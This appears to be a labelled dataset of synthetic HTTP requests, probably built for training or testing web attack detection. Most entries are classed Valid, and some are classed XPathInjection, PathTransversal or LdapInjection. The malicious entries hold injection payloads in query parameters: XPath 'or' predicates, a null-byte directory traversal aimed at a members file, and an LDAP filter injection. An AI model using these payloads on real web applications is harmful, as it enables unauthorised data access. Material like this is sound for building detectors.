If-None-Match: "KGJYu5@1UyyPQtdqfMoD"
If-Range: Sun, 26 Jun 05 12:16:53 GMT
Max-Forwards: 4
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: NTLM bGRoYWlzQXJ0bmhzYzhrZDVubWthYXNzdWtzZG90c296YW1lc1lyZWRjZWNwZW4=
Authorization: Basic ZXllTG9kOmhyaXY4cA==
Range: 491-
Referer: /be8Hak/EleeEe5/dclieeG/hebtRaT0.sh
TE: trailers,chunked,trailers
Trailer: Date
User-Agent: Mozilla/2.8 (compatible; hyWrcgrwco; Win98; tutcoanatr; ol7esmyth)
UA-CPU: StrongARM
UA-Disp: 751,4229,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 633x671
Via: prtodz/1.9 www.panhw.jpg, 9.4 35.196.198.37, 1.7 www.9Trpti.png
Transfer-Encoding: utmt; il5et=etaaPm
Upgrade: 3uen/0.9, a1ts/0.4, sidhd/7.5, fsam/4.5
Warning: 710 www.o4vrf.shtml "azenesqualg1oeEe" 
X-Forwarded-For: 96.51.246.201
X-Serial-Number: 67477074905757
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10826
Start - Id: 6591
class: Valid
POST /jiht2eleec/Vzf9ao/T5g_WGM/A2zCi32_ct.msf? HTTP/1.1
Content-Length: 260
Content-Language: y0tt,h,l
Content-Encoding: identity
Content-Location: http://www.stTtEe.ch/iFobi/l6uojw/seaa/ziaguxr/alrew.jpeg
Content-MD5: cGVlM2V6c2xzb3JidW9nag==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 14 Mar 07 10:23:59 UTC
Last-Modified: Thu, 22 Oct 09 24:09:32 CET
Host: www.vt3ta1.uk:80
Connection: close
Accept: audio/x-wav
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: min-fresh=4228
Client-ip: 54.15.143.98
Cookie: cbeqw0f=e2diGgINnJ;nIyerwoyAs=t__5B;Ijinzumnvo=saoctiedt;shhnetda=n ratmp\BedropsjnbtdI;cjaNBn=9
Cookie2: $Version="387"
Date: Mon, 18 Sep 06 05:40:16 CET
ETag: W/"nsD0a1CkAWY_edG"
Expect: incSs3s=ue0t
From: 3ee34ntt@wmete.be
If-Modified-Since: Thu, 14 Apr 05 15:02:23 CET
If-Unmodified-Since: Tue, 20 Mar 07 14:52:11 GMT
If-Match: "Sd49e97Zx767Woy9U1QI"
If-None-Match: "CF5jm89Ak3Ak-QHI@k"
If-Range: Wed, 14 Jul 04 22:20:46 CET
Max-Forwards: 7618
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic YWE1ZGhhZVU6YXVtZW9h
Range: -3876,430737-,39-
Referer: http://www.Tnazg3t.com/O06l/thggin/yt7lAs/otlcsi/httpMS.cfm
TE: deflate;q=0.7,trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/9.9 (Windows; U; Win98 1.1; ui-bf; rv:5.7.0) Gecko/68067039
UA-CPU: x86
UA-Disp: 0239,483,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2928x871
Via: 6.5 93.172.126.150
Transfer-Encoding: compress
Upgrade: o5nsev/4.7, tnlt/7.7, zdoi/3.6, iecrA/4.6
Warning: 015 www.S3hmat.js "rob00sy0uro5tLiaSgoN" 
X-Forwarded-For: 75.123.215.86
X-Serial-Number: 6276984626
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tZtg6eu4p7tu=84&cohxpiIgl=iislx&7J9JKaincludefTx@=eyJ03Xqj&fvmjpE5=791&H_EJ_HJ=nrehh0eaiaeAyusas&yie6uis9asio=sjsAgm&PwhereWhfS=2udalr&dwsnsibDeE8ai=9rmi&rnb2bdicaeee=387&oiall1=42574466&6ye9ea=94&It0pdocumentlnph-RJH=mo0gtZ&oos4ronvno=-vu h&caeal=ned&aY@54= s

End - Id: 6591
Start - Id: 49076
class: XPathInjection
GET /5T__iSFhhD/etsstsghwdnNet4T/2_m2Qgj6K5S9J/betweentpUibnUe9y-./uQWcGXYpIoARZYMxv/reurnleerlWtpgp.cfm?eHGq=27789809&gqyteeblnEoi0=itgrde%27+or+++M%2Feo%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D931%5D+++++or+%27asqdf%27+++%3D++%27&rt9s=3hinitlikeseuuRs2votydocumenttt&s36yisolo3w=0278163&etbuakeeee=kzleg2ohSt8rAt0n&eerEwa8E=exec4n6ooo&ien=k%26%264m+2leg HTTP/1.0
Host: www.ceihcjoTjc.ch:5
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: sawyeaa-sr;q=0.0, nage-a4d, 7oec-ttnaarso;q=0.8, euy-Irop
Cache-Control: lndt6dwo='f'
Client-ip: 22.250.1.169
Cookie: u6c9xdr=970157558
Cookie2: $Version="08"
Date: Fri, 28 Sep 07 08:42:45 GMT
ETag: W/"aZ8ZTNud-HRsWZoEVrn-"
Expect: 100-continue
From: norRi@7iswxtjsoi.uk
If-Modified-Since: Sat, 27 May 06 03:47:10 CET
If-Unmodified-Since: Sat, 10 Feb 07 07:47:44 CET
If-Match: "JjE1W-5YpcKz_Bq"
If-None-Match: "Sf4VuC0@7b1lH3oB7"
If-Range: *
Max-Forwards: 7
MIME-Version: 5.6
Pragma: q1peqba='dmm'
Proxy-Authorization: Digest opaque="h9eeeY"
Authorization: Digest algorithm=h4hoh
Range: -42,-211,1-7615
Referer: http://www.ioeo.org/lj4ngU9/Rhhe/meixfdN/8teye2.wav
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: Mozilla/7.3 (Machintosh; U; PPC Mac OS X 0.9; zc-5E; rv:4.1.6) Gecko/23896772
UA-CPU: x86
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 7313x7197
Via: 3.7 194.147.169.157:6021, 0.7 182.119.206.80
Transfer-Encoding: identity
Upgrade: ne0d/6.8, b5on/7.9, gcX8/0.6, bci/5.8, ibw/8.8
Warning: 069 www.eoApA.tiff "paahksminehn7lr6TE" "Wed, 28 Oct 09 15:16:56 CET"
X-Forwarded-For: 161.22.54.66
X-Serial-Number: 509527
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 49076
Start - Id: 13976
class: Valid
GET /sc@i/b4.l8/Idbuvae0eEzW777e/trEm/yo.lso/tCg2bi/V5kpassthrugSbgsoundHqXuorfromG/tn6oHediEehk3hgT/tepxhe.htm? HTTP/1.0
Host: www.teylomi.biz
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-kr;q=0.6, macintosh;q=0.6, utf-7, us-ascii, euc-cn
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 232.252.149.196
Cookie: ttk=:x
Cookie2: $Version="42"
Date: Thu, 21 Apr 05 08:06:59 UTC
ETag: W/"8JXFlRSCoI-nI9R6pUv"
Expect: bnaeity
From: sTsgewns@snfh4s.it
If-Modified-Since: Fri, 20 May 05 08:29:51 GMT
If-Unmodified-Since: Mon, 23 Feb 09 19:27:10 UTC
If-Match: "6wIa.bVFxpX.9xkc"
If-None-Match: "74sd4VC5IMRbtkcgV"
If-Range: *
Max-Forwards: 666
MIME-Version: 9.0
Pragma: axs=dmnAbh
Proxy-Authorization: NTLM dGliYmVwYU1oZXN6NXJlbkRvb2ZlYTh0aW5PcjFSZW9lbmJsZQ==
Authorization: Digest response="0EbEB0dD97E15B80Ac1ED7b9D4BDf79C"
Range: -895005
Referer: http://aa6sdt.fr/utagtX/haitcZa.jpg
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: fdcOi/9.2.9.0.6
UA-CPU: MIPS
UA-Disp: 7939,4903,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7780x7588
Via: 7.4 www.iiqenF3S.css:9776
Transfer-Encoding: identity
Upgrade: tiowa/3.9, SsnfV/0.1
Warning: 331 169.34.182.93:52 "segnerwEd" 
X-Forwarded-For: 90.110.72.221
X-Serial-Number: 738264285065396
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 13976
Start - Id: 26192
class: Valid
GET /eihchotrelouo6h0Ni/vZU/CtIOaoner/rz/Red6bdwiizeawas/ekatwbredscamebolkeN/ivhedhasS/sJTshwHDkhTFNrW.exe?olkh=doiisuO&8Mj6services26=f3j2jm%409cN3k&srseiime=45&iseCnuaiens=zne5ttogaat&tU=1641431&eH4ga=3429591&fd=rcopy4h+3ryhttpsaanulloc9&p9XR_echoEXtelnet0=at%40b_wGWU&nnduvptlse1=sscriptti+acceptinee&etkn9reaN=%3Fgab%29msonqO HTTP/1.1
Host: 223.97.78.205
Connection: lrxka
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: max-stale
Client-ip: 200.48.13.171
Cookie: NroAihctgtlesw=3078;ARn8la52t=8282368;nceDgxeosthnn=cctwoxhsi=4tih;anT7dsotsti1ir=da% ;LpositionCiUOechoQLq.8=55500217
Cookie2: $Version="79"
Date: Fri, 26 Jan 07 08:10:10 CET
ETag: "JcbwuqTF96ZmBk@TmAG"
Expect: 100-continue
From: 3hydema@pttee.de
If-Modified-Since: Sat, 06 Aug 05 01:58:37 UTC
If-Unmodified-Since: Tue, 05 Jul 05 03:00:30 GMT
If-Match: *
If-None-Match: "dL1-kPuAt_bNn6MENqjS"
If-Range: *
Max-Forwards: 262
MIME-Version: 2.8
Pragma: MtCETdue='d'
Proxy-Authorization: Basic ZWljdW06aDdkSW8=
Authorization: NTLM bGVuZ3NlYm5odG9hQWV2S3BldHMxRWVrYW10ZXZnZW43aHJlRWRpbm9q
Range: 863391-,79-36
Referer: /lrnop1/grwi9/o4repLni.sh
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/9.6 (compatible; Konqueror/2.1; Mac OS X; 4eed)
UA-CPU: MIPS
UA-Disp: 048,473,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0211x5802
Via: HTTP/7.8 53.70.124.38, 4.4 www.ageOa.jpg, FTP/0.2 179.12.71.150
Transfer-Encoding: compress
Upgrade: ehiiB/7.2, yq3zM6/2.7, cdle/0.9, toodwq/0.1
Warning: 072 www.cUEomj7n.html:46118 "aodn" "Sun, 21 Jun 09 18:25:54 CET"
X-Forwarded-For: 117.153.119.109
X-Serial-Number: 2106773576
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26192
Start - Id: 7807
class: Valid
PUT /ihR2laJheqny/aDY2UtDcNs8tR.pl? HTTP/1.1
Content-Length: 149
Content-Language: siNaoo8,fskucOw,k
Content-Encoding: identity
Content-Location: /pvztn/3leaNdl.wmn
Content-MD5: Z2xtYW51MHhkb29lMGxldA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 26 Jan 10 16:58:37 GMT
Last-Modified: Wed, 08 Aug 07 18:25:47 UTC
Host: 165.180.216.236:2
Connection: keep-alive
Accept: video/mpeg;q=0.2, audio/x-wav;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: efew4sq-Zal2;q=0.8, tecO-lm2;q=0.9, yhn-ai;q=0.3
Cache-Control: no-cache
Client-ip: 167.26.49.158
Cookie: 4stitvrthre=lfiRy9nwieX
Cookie2: $Version="483"
Date: Sat, 06 Mar 04 24:46:26 UTC
ETag: "ugBd2l0lTKnjtVWuG@"
Expect: 100-continue
From: msDNtTe@mtt5jy.de
If-Modified-Since: Thu, 26 Aug 04 19:33:56 CET
If-Unmodified-Since: Thu, 05 Aug 04 03:51:03 UTC
If-Match: *
If-None-Match: ".fO.jrjU4FZuuG4paQ"
If-Range: *
Max-Forwards: 3855
MIME-Version: 8.5
Pragma: u='ottri'
Proxy-Authorization: 7aei tsnne=rLhupn
Authorization: 2uguwn netNyn=hoaaaozt
Range: -839517
Referer: /fadsaDmn/UElgvy1/sgex.mpeg
TE: deflate;q=0.2,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/7.6 (Windows; U; WinNT 6.2; ns-cy; rv:8.1.5) Gecko/88896978
UA-CPU: StrongARM
UA-Disp: 179,7168,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 669x1617
Via: FTP/8.7 www.ltNklevr.shtml
Transfer-Encoding: compress
Upgrade: ust1/3.5, e8ibat/3.2, hmnil/5.3
Warning: 942 250.5.20.192 "brnistmyZweTt" "Tue, 13 Apr 10 19:40:14 UTC"
X-Forwarded-For: 40.157.103.88
X-Serial-Number: 27066605
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

rmonennH=221&aznnrwqdnx=6829200&eEfut3rdoa1aloe=Wi&nXSoTfaitm=625&ly8li8r3T=2Vk-wL&rve=8157&Aiheo3r=fftpr&e6waeuwa=lash&tedopgiea=re1&28gcSO=09510193

End - Id: 7807
Start - Id: 20275
class: Valid
GET /iZUSlX.exe?a7irmdtwvtmefm=%3Bsstdinc&oa=o0s%40my&on8Sgeho=7&lo7iefkcsial6=70&Yq@@=uhlTaat&5vQ4D6=wNDg&WaEn=2334&sns=0726842 HTTP/1.1
Host: 155.151.125.48:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: seoed0iB-oeC, 7tNxcx-ttneshd, d-a
Cache-Control: max-stale=84
Client-ip: 102.229.160.142
Cookie: ossittnbatrorl=rq_Wd;Suel0b=settmp1@jop8
Cookie2: $Version="235"
Date: Mon, 25 Aug 08 14:18:57 CET
ETag: W/"GaGJnzog2Z7mqcrS0jW"
Expect: 100-continue
From: OolLe3@sxRs.net
If-Modified-Since: Fri, 20 Oct 06 16:26:11 GMT
If-Unmodified-Since: Sat, 26 Jul 08 24:14:11 GMT
If-Match: *
If-None-Match: "ILnLTVNZFZg_DFp"
If-Range: Wed, 06 Dec 06 01:27:22 CET
Max-Forwards: 1
MIME-Version: 1.5
Pragma: it=egOsew5e
Proxy-Authorization: NTLM Y25lYWFlZXJybjZHZXNkYXRzY21ld2VvZG5zOHVhaGRseGVmZWVodGd3c29lbA==
Authorization: Basic YnRyZXlvOmE0NG9udA==
Range: 2-254176
Referer: http://www.3tont.ch/iStrie.exe
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.1 (X11; U; Open BSD i586 0.5; ou-p7; rv:5.2.2) Gecko/96758258
UA-CPU: MIPS
UA-Disp: 161,462,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0564x652
Via: 9.5 www.a4alh.shtml, 8.6 43.69.126.174, FTP/8.9 94.159.133.232
Transfer-Encoding: e8rjre; itsvny=a3aitbd
Upgrade: eCc/4.2, tne/4.8, kdeqH/8.0
Warning: 058 www.eyes9l.tiff "iseRqeh6t" 
X-Forwarded-For: 97.185.253.211
X-Serial-Number: 11361465282
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20275
Start - Id: 2125
class: Valid
GET /e7f8/g0kwj@wR/aaVrs7h20osulalii4jt/wwp--5tfCusrYFiQ/3dLxsDUV-jpgEG-fqgHy/toree6otrss8mhhhb/Zy@vfcatxmlAe7W/i4/@oJgMIUebz/ntas7umau/Lgen5t9ybo88qebo33mT/nnx_5yGIjHuUyjd.tiff?logZ2ygIrb19EC=63921&nai3eS8slslt=deaafmha4odtieS HTTP/1.1
Host: 141.25.3.228:80
Connection: close
Accept: image/gif;q=0.2, application/*;q=0.7
Accept-Charset: utf-8, iso-8859-4;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=96
Client-ip: 237.9.247.14
Cookie: hwbh5whelirodrG=t05uWBp;it83fosoine=265;eti8eoeipn=9652905;e4iEwhoeel=asNtbruhe;tZz4scriptS22dscript=Aptexp_rooN;tepmn;2hen=608
Cookie2: $Version="376"
Date: Tue, 27 Oct 09 22:57:24 CET
ETag: "09iF8mEMXLjnDD1jAIFd"
Expect: fi2eoiSe
From: m5h3d@tewicbp3ee.be
If-Modified-Since: Wed, 16 Jun 04 12:43:23 CET
If-Unmodified-Since: Tue, 26 Jul 05 09:57:51 CET
If-Match: "@9DCtMpZKYt7C0CW3"
If-None-Match: "JRZAfMeNWXKrS_21"
If-Range: *
Max-Forwards: 2
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Basic SEVoY3RjOmFOaGVpaW92
Range: 9797-
Referer: /eiklia/oesko.conf
TE: trailers,chunked;q=0.1
Trailer: From
User-Agent: ssetcvteen (rPRCnAW; vlKsZJiMy)
UA-CPU: MIPS
UA-Disp: 4115,383,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 539x1521
Via: HTTP/0.2 41.224.211.15, FTP/6.7 169.204.47.57, 5.6 222.5.226.93
Transfer-Encoding: uyCn
Upgrade: LqnoEm/4.0, 2Odnr/2.0, ioip/3.7, qMe/8.4
Warning: 456 www.asdhn.gif:2845 "ronln6simQtdh" "Thu, 30 Jul 09 15:57:06 GMT"
X-Forwarded-For: 209.131.51.221
X-Serial-Number: 86831
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 2125
Start - Id: 44999
class: PathTransversal
GET /rq4yNhsu38rd0neeRe/qDXeS@_OAQ.jsp?orajsncRm=..%2F..%2FUBData%2FMembers%2Fmembers.grp%2500&@tmpENi=rcbxmzgamk&gmotte9=iGktalheoescriptvaa&cBea=9UKvqA HTTP/1.0
Host: 88.136.131.134
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesetrad
Accept-Encoding: gzip, compress, gzip, deflate;q=0.6, deflate
Accept-Language: *
Cache-Control: no-cache
Cookie: 5botiedmb1nwiHd=4374
Cookie2: $Version="13"
Date: Thu, 07 Apr 05 07:12:45 UTC
ETag: "06Aqq7j6Gd0C_dK"
Expect: geoa=c7iean2o
From: SiHai3@Rl2imga.fr
If-Modified-Since: Fri, 21 Mar 08 21:37:00 UTC
If-Unmodified-Since: Fri, 29 Jan 10 17:19:30 UTC
If-Match: *
If-None-Match: "mN62FTj-AKEOiZM"
If-Range: Sun, 20 Dec 09 24:08:41 CET
Max-Forwards: 8584
MIME-Version: 6.7
Pragma: osxui='s'
Authorization: Basic cmdjaXJiYWw6UnRsdHA=
Referer: http://xerhyG2.be/lmxH/krl4feu/uiei.swf
TE: chunked;q=0.8,chunked;q=0.5,deflate;q=0.6
User-Agent: Mozilla/9.3 (Windows; U; Win 9x 4.3; hl-at; rv:0.8.7) Gecko/65378589
UA-Disp: 6840,695,32
UA-Pixels: 6392x1633
Via: 8.8 197.52.0.15:1, 8.2 179.204.73.161:620, 8.0 www.yreq.css
Transfer-Encoding: deflate
Upgrade: Eubq/3.7
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44999
Start - Id: 38469
class: LdapInjection
GET /t0qEQcSv6xs0LZ3/nLqJNrQa350-/saytkmrlp/nBvtaupN8whw/iNp1rrG74oxvR49.yF./icy/Tkr0Y65/s00rc@EPm/iAurmReoqlhW.asp?lsGRpassthru=nmoergexi&ndyahufuao=64&e0cn3suiretTe=wes%29%28%26%28objectClass++++%3D++++0dtb*%29&oEii=Ggp&d3sitqcto=%40+k&wgetcprocessing-instructionE=8arcpean2 HTTP/1.1
Host: 238.124.237.247
Connection: keep-alive
Accept: image/jpeg, image/jpeg, video/mpeg
Accept-Charset: *
Accept-Encoding: gzip;q=0.5, gzip, identity
Accept-Language: iaseuaq-m;q=0.1, hsea-mI, 2revqis-et;q=0.5, lsgeil-j, sSRntw-rhrti;q=0.3
Cache-Control: only-if-cached
Client-ip: 86.172.21.20
Cookie: hmhoeaznnwgso=5429;osAtggxhshee2t=onmjfarumxudo;Etqe=9;ifxt=re;my=19021;pbaeeeuwEeBotl=r7A6aAtzgGM
Cookie2: $Version="554"
Date: Mon, 30 Jul 07 08:43:21 CET
ETag: W/"vEDWR6w_MB0Mrrjov"
Expect: betmtr=nyjiso;hCgrf6g
From: odvt@tmdyhis.org
If-Modified-Since: Sat, 06 Aug 05 23:56:40 UTC
If-Unmodified-Since: Tue, 20 Jun 06 11:04:42 UTC
If-Match: "YvDv9TrIFAa__EZrGJn"
If-None-Match: "RzuCa6ABr-cdfq4"
If-Range: "kmB87cCqg7ghVVfoR"
Max-Forwards: 9
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: iiEb vcnyig9=nalmt
Authorization: hoec no8en=Rmneert
Range: 24-,76759-,-19589
Referer: http://C5eqo5sa.it/dreupl.pl
TE: trailers
Trailer: Cache-Control
User-Agent: Xosedt (kcWbqqK8_; ex-YS4Y)
UA-CPU: 68000
UA-Disp: 3037,4035,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 632x125
Via: 5.0 www.eilhyt.js:22, 9.7 202.26.190.36
Transfer-Encoding: gzip
Upgrade: Nlohim/6.2, ors/6.8, ine/9.2, aauq/0.7, cvl87u/8.4
Warning: 616 131.165.120.56:1 "csPssf" 
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38469
Start - Id: 49837
class: XPathInjection
GET /qwXkyyj@fNMA/ntee7/u1drcamrseootartCiRa/m5prsuenraeepxeei/etausmehisOoma1e/tylo-PfE9b44Rsy/d4MfnIGVhl8pb71l/oX0ifz/@KCXdwgetB-qvNV/i6EG/Jdmailq8b@droptOGJnvr/otteja.cfm?ttAndmdd5Ie9=uJlt85&achudojs3nRJh=ttcatsH&isoeLulsXe=974++or++++e%2Fl7igRh%2Fsw3Tr%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D58%5D+or+++++9393%3D&W5pW=ai5irr2&ttrtecu=ge2E&aeintgun=sUVH_ HTTP/1.1
Host: www.mfftciy9tr.de:495
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: cp-936, iso-8859-8-i;q=0.5, windows-874, iso-8859-5, iso-8859-9
Accept-Encoding: *
Accept-Language: lwto-Nsd, oreu-srse8qa;q=0.4
Cache-Control: max-stale=1
Client-ip: 77.69.248.51
Cookie: IeN6iA.openkt=055763;awiaon6silnRaO=22
Cookie2: $Version="7"
Date: Sat, 04 Feb 06 11:32:23 UTC
ETag: "cRd@wIXMwE63R.EvjfGq"
Expect: sgt9Obf=4tdadt
From: dlraatp@oeowhntmtq.org
If-Modified-Since: Sat, 16 Dec 06 07:30:04 GMT
If-Unmodified-Since: Sat, 02 Dec 06 21:21:14 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 08 Nov 06 06:35:22 CET
Max-Forwards: 737
MIME-Version: 4.3
Pragma: kiatrne='Ri'
Proxy-Authorization: Basic bGFydHZyOGM6OFNvbGNldA==
Authorization: Digest cnonce="lHEu2tee"
Range: -16,498057-,69-3
Referer: /hnc1er.cfm
TE: trailers,deflate;q=0.2
Trailer: Accept
User-Agent: pv97tmseOo
UA-CPU: Sparc
UA-Disp: 242,752,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 172x6984
Via: HTTP/2.8 www.rto5.gif, 7.3 www.emomcuu.jpg
Transfer-Encoding: gzip
Upgrade: soar/0.1
Warning: 245 www.ameroeqh.js "imm4hes1ae" 
X-Forwarded-For: 102.140.21.48
X-Serial-Number: 684744620
----: ----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49837
Start - Id: 15315
class: Valid
GET /2tnocssdeS3rwb/m1itgnyAEwlMno6m/ro/mleadana0/ePHHopo0zQ_s-goka@R/LKJR44UZandQtmp/4uIg/mailuS3BKTbjGzF/Uioi.sh?Etri8iybYg=ti&esraaursd=iprocessing-instructionh&i0l9plef6xemei=shc1eiaeamcest8&4shoocce3vy7=exec%2B&0ndlr=1e%3FtetVdS-oed&zssr=0065856&FH-VLzumGstylek=fiiuunion%3Apsftl HTTP/1.0
Host: www.a7ieLssan.uk
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: x-mac-chinesesimp;q=0.3, iso-2022-jp;q=0.4, windows-1251, x-mac-cyrillic;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 31.24.207.57
Cookie: we=67;44ai67s=510;etbHasa9yl=tHgSs3a
Cookie2: $Version="3"
Date: Sun, 17 Jun 07 22:38:36 UTC
ETag: W/"wC8rBWuKAC-CzWi"
Expect: h3o1=tornearr;u7u5=u3eAi
From: sbR2u@rgtt.st
If-Modified-Since: Sun, 28 Mar 04 01:40:40 UTC
If-Unmodified-Since: Fri, 08 Dec 06 20:31:47 CET
If-Match: "BmMAppj3Vs0@PeI"
If-None-Match: *
If-Range: Mon, 27 Oct 08 14:59:52 GMT
Max-Forwards: 424
MIME-Version: 3.3
Pragma: hJIlre='9rxtr'
Proxy-Authorization: a3ashh fyuhrze=uoTtep0T
Authorization: Digest response="a8eD3EDA93e6239F53312d6Fb0daE5DF"
Range: 604-0,1-54,-12
Referer: http://acuwzki.com/0taseb/egoy/hJeJt6.dll
TE: gzip,trailers
Trailer: If-Range
User-Agent: gseEe8 (fClqHFZ6u)
UA-CPU: 68000
UA-Disp: 331,6855,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 9424x098
Via: FTP/4.5 www.eechdh.jpeg
Transfer-Encoding: deflate
Upgrade: 3hc2/0.6, 3ner/5.3, i8e6ti/2.6, hoN/8.2, aise/6.4
Warning: 649 149.116.106.106 "Fb6sieGmla8" 
X-Forwarded-For: 181.70.199.85
X-Serial-Number: 4648652857
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15315
Start - Id: 33443
class: Valid
POST /nJSgn/adminTptSoWahc3Y/r5GL/nZ6_LY2BA0gr@d0/rQIKOt@L4F5ECGJXrZsi/utRntkqto8e/lpJZ6OLV941WOpp-M6AT/m.SVN7tk/7MbYr.htm? HTTP/1.0
Content-Length: 53
Content-Language: p,teeoa
Content-Encoding: identity
Content-Location: http://hsxsa.biz/o7j73t/uunwaidh/terohu.jsp
Content-MD5: bnRqbklpZW5sZXlldThNeQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 07 Nov 05 23:34:30 CET
Last-Modified: Mon, 26 May 08 03:41:54 UTC
Host: 48.185.157.52:3552
Connection: close
Accept: */*;q=0.6
Accept-Charset: macintosh, isiri-3342;q=0.1, isiri-3342;q=0.7
Accept-Encoding: 
Accept-Language: i-jl;q=0.1, eo-deTtInod;q=0.1, rrrgrdt-ph2eet;q=0.9, 3zwsra-ioptn;q=0.0, cye-cgi;q=0.2
Cache-Control: no-store
Client-ip: 192.144.253.244
Cookie: orbeoolweatxoy=1lc8;zbeo=uCuImo3;3d@orXnodecmdD6E=07;mm=310442
Cookie2: $Version="6"
Date: Sun, 25 May 08 11:36:24 UTC
ETag: "lv0nA.ltI3PTp.u2hX"
Expect: 100-continue
From: airohua@gtscArwrS.org
If-Modified-Since: Mon, 02 Oct 06 02:38:20 GMT
If-Unmodified-Since: Sun, 11 Apr 10 19:28:23 UTC
If-Match: "@fcdvSTWLTD3zXNn"
If-None-Match: *
If-Range: Wed, 15 Jul 09 01:26:48 CET
Max-Forwards: 14
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Basic cnRjZW86bnNucmZu
Authorization: Basic ZGhkcnRxUXc6ZXFuYQ==
Range: 6-,-8,-324
Referer: http://www.snttzoT.st/k2Rrt.tiff
TE: trailers,trailers
Trailer: Accept-Encoding
User-Agent: eeItcaet (ssP3ds; hWb4Z8dNm; eDT5wB.w6X)
UA-CPU: StrongARM
UA-Disp: 9739,949,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 669x659
Via: HTTP/4.1 81.37.93.231
Transfer-Encoding: deflate
Upgrade: encr/4.7, csRuef/7.1, ee6/1.4, tehaa/9.8, 7en/7.5
Warning: 339 61.166.132.90 "rcet3Eom" "Thu, 02 Nov 06 21:37:37 CET"
X-Forwarded-For: 229.236.129.140
X-Serial-Number: 522982707
----: ---------------------
~~~~~: ~~~~~~~~~~~~

tWn=a&veei2eyo9inwkt=OiG qhttpor-acTert&qefsoesS=7291

End - Id: 33443
Start - Id: 35793
class: XPathInjection
GET /lpzrAyRHR1gG@a/0h-%uzWbNd_jU/oneittasncxkst/edae2/hen8lttilhth/hWeAHky0QRE6.cc.r6wI/khEo4ii7hg/lu/e8PfZ.jpeg?b0KpQN=xp_4iv&3tQvandN=Weenamijw&p4@s=091&ruaeta=tpfsimTTthf&ridfna=lzsC&aettualDsr=303&onUtozf8et2=%24tmpav6+0b9auz+a&deaAtter7re=f%24l-%5Be&hikthe0uAa=t3kRRXm&Tee89djhncbbqa4=lXdre&N-HXI2=erd_f&50ag7noaAdrs5Ih=946&heto7d=aup9mstdint+%24&ieterflmyee=sorz%2Fk%2Fielrv%2Fchild%3A%3Anode%28%29%5B+++++position%28%29%3D4%5D+++%7C++++weio%2Fsewad%2F1aoos4%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D48%5D++or+%27oi%27+%3D++++%27&SoedA2bTyXF=voi4fKale HTTP/1.1
Host: 166.53.128.125
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 111.27.1.64
Cookie: 4ZaaQ=33577516;uellh=Ie~
Cookie2: $Version="6"
Date: Mon, 16 Mar 09 01:54:51 GMT
ETag: "BC6ce8C_dnKt4s0Z."
